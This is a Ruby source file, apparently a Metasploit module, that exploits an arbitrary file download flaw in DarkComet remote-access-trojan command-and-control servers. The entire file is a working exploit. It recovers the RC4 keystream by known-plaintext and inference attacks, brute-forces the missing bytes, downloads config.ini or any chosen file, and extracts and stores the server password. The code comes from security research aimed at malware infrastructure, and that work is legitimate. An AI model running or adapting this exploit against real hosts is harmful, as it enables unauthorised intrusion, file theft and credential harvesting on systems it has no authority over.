425 lines
13 KiB
Ruby
425 lines
13 KiB
Ruby
##
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# This module requires Metasploit: http://metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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##
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require 'msf/core'
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class MetasploitModule < Msf::Auxiliary
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include Msf::Exploit::Remote::Tcp
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include Msf::Auxiliary::Report
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'DarkComet Server Remote File Download Exploit',
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'Description' => %q{
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This module exploits an arbitrary file download vulnerability in the DarkComet C&C server versions 3.2 and up.
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The exploit does not need to know the password chosen for the bot/server communication.
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},
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'License' => MSF_LICENSE,
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'Author' =>
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[
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'Shawn Denbow & Jesse Hertz', # Vulnerability Discovery
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'Jos Wetzels' # Metasploit module, added support for versions < 5.1, removed need to know password via cryptographic attack
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],
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'References' =>
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[
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[ 'URL', 'https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf' ],
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[ 'URL', 'http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware' ]
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],
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'DisclosureDate' => 'Oct 08 2012',
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'Platform' => 'win'
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))
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register_options(
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[
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Opt::RPORT(1604),
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Opt::RHOST('0.0.0.0'),
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OptString.new('LHOST', [true, 'This is our IP (as it appears to the DarkComet C2 server)', '0.0.0.0']),
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OptString.new('KEY', [false, 'DarkComet RC4 key (include DC prefix with key eg. #KCMDDC51#-890password)', '']),
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OptBool.new('NEWVERSION', [false, 'Set to true if DarkComet version >= 5.1, set to false if version < 5.1', true]),
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OptString.new('TARGETFILE', [false, 'Target file to download (assumes password is set)', '']),
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OptBool.new('STORE_LOOT', [false, 'Store file in loot (will simply output file to console if set to false).', true]),
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OptInt.new('BRUTETIMEOUT', [false, 'Timeout (in seconds) for bruteforce attempts', 1])
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], self.class)
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end
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# Functions for XORing two strings, deriving keystream using known plaintext and applying keystream to produce ciphertext
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def xor_strings(s1, s2)
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s1.unpack('C*').zip(s2.unpack('C*')).map { |a, b| a ^ b }.pack('C*')
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end
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def get_keystream(ciphertext, known_plaintext)
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c = [ciphertext].pack('H*')
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if known_plaintext.length > c.length
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return xor_strings(c, known_plaintext[0, c.length])
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elsif c.length > known_plaintext.length
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return xor_strings(c[0, known_plaintext.length], known_plaintext)
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else
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return xor_strings(c, known_plaintext)
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end
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end
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def use_keystream(plaintext, keystream)
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if keystream.length > plaintext.length
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return xor_strings(plaintext, keystream[0, plaintext.length]).unpack('H*')[0].upcase
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else
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return xor_strings(plaintext, keystream).unpack('H*')[0].upcase
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end
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end
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# Use RubyRC4 functionality (slightly modified from Max Prokopiev's implementation https://github.com/maxprokopiev/ruby-rc4/blob/master/lib/rc4.rb)
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# since OpenSSL requires at least 128-bit keys for RC4 while DarkComet supports any keylength
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def rc4_initialize(key)
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@q1 = 0
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@q2 = 0
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@key = []
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key.each_byte { |elem| @key << elem } while @key.size < 256
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@key.slice!(256..@key.size - 1) if @key.size >= 256
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@s = (0..255).to_a
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j = 0
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0.upto(255) do |i|
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j = (j + @s[i] + @key[i]) % 256
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@s[i], @s[j] = @s[j], @s[i]
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end
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end
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def rc4_keystream
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@q1 = (@q1 + 1) % 256
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@q2 = (@q2 + @s[@q1]) % 256
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@s[@q1], @s[@q2] = @s[@q2], @s[@q1]
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@s[(@s[@q1] + @s[@q2]) % 256]
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end
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def rc4_process(text)
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text.each_byte.map { |i| (i ^ rc4_keystream).chr }.join
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end
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def dc_encryptpacket(plaintext, key)
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rc4_initialize(key)
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rc4_process(plaintext).unpack('H*')[0].upcase
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end
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# Try to execute the exploit
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def try_exploit(exploit_string, keystream, bruting)
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connect
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idtype_msg = sock.get_once(12)
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if idtype_msg.length != 12
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disconnect
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return nil
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end
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if datastore['KEY'] != ''
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exploit_msg = dc_encryptpacket(exploit_string, datastore['KEY'])
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else
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# If we don't have a key we need enough keystream
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if keystream.nil?
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disconnect
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return nil
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end
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if keystream.length < exploit_string.length
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disconnect
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return nil
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end
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exploit_msg = use_keystream(exploit_string, keystream)
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end
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sock.put(exploit_msg)
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if bruting
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begin
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ack_msg = sock.timed_read(3, datastore['BRUTETIMEOUT'])
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rescue Timeout::Error
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disconnect
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return nil
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end
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else
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ack_msg = sock.get_once(3)
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end
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if ack_msg != "\x41\x00\x43"
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disconnect
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return nil
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# Different protocol structure for versions >= 5.1
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elsif datastore['NEWVERSION'] == true
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if bruting
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begin
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filelen = sock.timed_read(10, datastore['BRUTETIMEOUT']).to_i
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rescue Timeout::Error
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disconnect
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return nil
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end
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else
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filelen = sock.get_once(10).to_i
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end
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if filelen == 0
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disconnect
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return nil
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end
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if datastore['KEY'] != ''
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a_msg = dc_encryptpacket('A', datastore['KEY'])
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else
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a_msg = use_keystream('A', keystream)
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end
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sock.put(a_msg)
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if bruting
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begin
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filedata = sock.timed_read(filelen, datastore['BRUTETIMEOUT'])
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rescue Timeout::Error
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disconnect
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return nil
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end
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else
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filedata = sock.get_once(filelen)
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end
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if filedata.length != filelen
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disconnect
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return nil
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end
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sock.put(a_msg)
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disconnect
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return filedata
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else
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filedata = ''
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if bruting
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begin
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msg = sock.timed_read(1024, datastore['BRUTETIMEOUT'])
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rescue Timeout::Error
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disconnect
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return nil
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end
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else
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msg = sock.get_once(1024)
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end
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while (!msg.nil?) && (msg != '')
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filedata += msg
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if bruting
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begin
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msg = sock.timed_read(1024, datastore['BRUTETIMEOUT'])
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rescue Timeout::Error
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break
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end
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else
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msg = sock.get_once(1024)
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end
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end
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disconnect
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if filedata == ''
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return nil
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else
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return filedata
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end
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end
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end
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# Fetch a GetSIN response from C2 server
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def fetch_getsin
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connect
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idtype_msg = sock.get_once(12)
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if idtype_msg.length != 12
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disconnect
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return nil
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end
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keystream = get_keystream(idtype_msg, 'IDTYPE')
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server_msg = use_keystream('SERVER', keystream)
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sock.put(server_msg)
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getsin_msg = sock.get_once(1024)
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disconnect
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getsin_msg
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end
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# Carry out the crypto attack when we don't have a key
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def crypto_attack(exploit_string)
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getsin_msg = fetch_getsin
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if getsin_msg.nil?
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return nil
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end
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getsin_kp = 'GetSIN' + datastore['LHOST'] + '|'
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keystream = get_keystream(getsin_msg, getsin_kp)
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if keystream.length < exploit_string.length
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missing_bytecount = exploit_string.length - keystream.length
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print_status("Missing #{missing_bytecount} bytes of keystream ...")
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inferrence_segment = ''
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brute_max = 4
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if missing_bytecount > brute_max
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print_status("Using inferrence attack ...")
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# Offsets to monitor for changes
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target_offset_range = []
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for i in (keystream.length + brute_max)..(keystream.length + missing_bytecount - 1)
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target_offset_range << i
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end
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# Store inference results
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inference_results = {}
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# As long as we haven't fully recovered all offsets through inference
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# We keep our observation window in a circular buffer with 4 slots with the buffer running between [head, tail]
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getsin_observation = [''] * 4
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buffer_head = 0
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for i in 0..2
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getsin_observation[i] = [fetch_getsin].pack('H*')
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Rex.sleep(0.5)
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end
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buffer_tail = 3
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# Actual inference attack happens here
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while !target_offset_range.empty?
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getsin_observation[buffer_tail] = [fetch_getsin].pack('H*')
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Rex.sleep(0.5)
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# We check if we spot a change within a position between two consecutive items within our circular buffer
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# (assuming preceding entries are static in that position) we observed a 'carry', ie. our observed position went from 9 to 0
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target_offset_range.each do |x|
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index = buffer_head
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while index != buffer_tail do
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next_index = (index + 1) % 4
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# The condition we impose is that observed character x has to differ between two observations and the character left of it has to differ in those same
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# observations as well while being constant in at least one previous or subsequent observation
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if (getsin_observation[index][x] != getsin_observation[next_index][x]) && (getsin_observation[index][x - 1] != getsin_observation[next_index][x - 1]) && ((getsin_observation[(index - 1) % 4][x - 1] == getsin_observation[index][x - 1]) || (getsin_observation[next_index][x - 1] == getsin_observation[(next_index + 1) % 4][x - 1]))
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target_offset_range.delete(x)
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inference_results[x] = xor_strings(getsin_observation[index][x], '9')
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break
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end
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index = next_index
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end
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end
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# Update circular buffer head & tail
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buffer_tail = (buffer_tail + 1) % 4
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# Move head to right once tail wraps around, discarding oldest item in circular buffer
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if buffer_tail == buffer_head
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buffer_head = (buffer_head + 1) % 4
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end
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end
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# Inferrence attack done, reconstruct final keystream segment
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inf_seg = ["\x00"] * (keystream.length + missing_bytecount)
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inferrence_results.each do |x, val|
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inf_seg[x] = val
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end
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inferrence_segment = inf_seg.slice(keystream.length + brute_max, inf_seg.length).join
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missing_bytecount = brute_max
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end
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if missing_bytecount > brute_max
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print_status("Improper keystream recovery ...")
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return nil
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end
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print_status("Initiating brute force ...")
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# Bruteforce first missing_bytecount bytes of timestamp (maximum of brute_max)
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charset = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']
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char_range = missing_bytecount.times.map { charset }
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char_range.first.product(*char_range[1..-1]) do |x|
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p = x.join
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candidate_plaintext = getsin_kp + p
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candidate_keystream = get_keystream(getsin_msg, candidate_plaintext) + inferrence_segment
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filedata = try_exploit(exploit_string, candidate_keystream, true)
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if !filedata.nil?
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return filedata
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end
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end
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return nil
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end
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try_exploit(exploit_string, keystream, false)
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end
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def parse_password(filedata)
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filedata.each_line { |line|
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elem = line.strip.split('=')
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if elem.length >= 1
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if elem[0] == 'PASSWD'
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if elem.length == 2
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return elem[1]
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else
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return ''
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end
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end
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end
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}
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return nil
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end
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def run
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# Determine exploit string
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if datastore['NEWVERSION'] == true
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if (datastore['TARGETFILE'] != '') && (datastore['KEY'] != '')
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exploit_string = 'QUICKUP1|' + datastore['TARGETFILE'] + '|'
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else
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exploit_string = 'QUICKUP1|config.ini|'
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end
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elsif (datastore['TARGETFILE'] != '') && (datastore['KEY'] != '')
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exploit_string = 'UPLOAD' + datastore['TARGETFILE'] + '|1|1|'
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else
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exploit_string = 'UPLOADconfig.ini|1|1|'
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end
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# Run exploit
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if datastore['KEY'] != ''
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filedata = try_exploit(exploit_string, nil, false)
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else
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filedata = crypto_attack(exploit_string)
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end
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# Harvest interesting credentials, store loot
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if !filedata.nil?
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# Automatically try to extract password from config.ini if we haven't set a key yet
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if datastore['KEY'] == ''
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password = parse_password(filedata)
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if password.nil?
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print_status("Could not find password in config.ini ...")
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elsif password == ''
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print_status("C2 server uses empty password!")
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else
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print_status("C2 server uses password [#{password}]")
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end
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end
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# Store to loot
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if datastore['STORE_LOOT'] == true
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print_status("Storing data to loot...")
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if (datastore['KEY'] == '') && (datastore['TARGETFILE'] != '')
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store_loot("darkcomet.file", "text/plain", datastore['RHOST'], filedata, 'config.ini', "DarkComet C2 server config file")
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else
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store_loot("darkcomet.file", "text/plain", datastore['RHOST'], filedata, datastore['TARGETFILE'], "File retrieved from DarkComet C2 server")
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end
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else
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print_status(filedata.to_s)
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end
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else
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print_status("Attack failed or empty config file encountered ...")
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end
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end
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end
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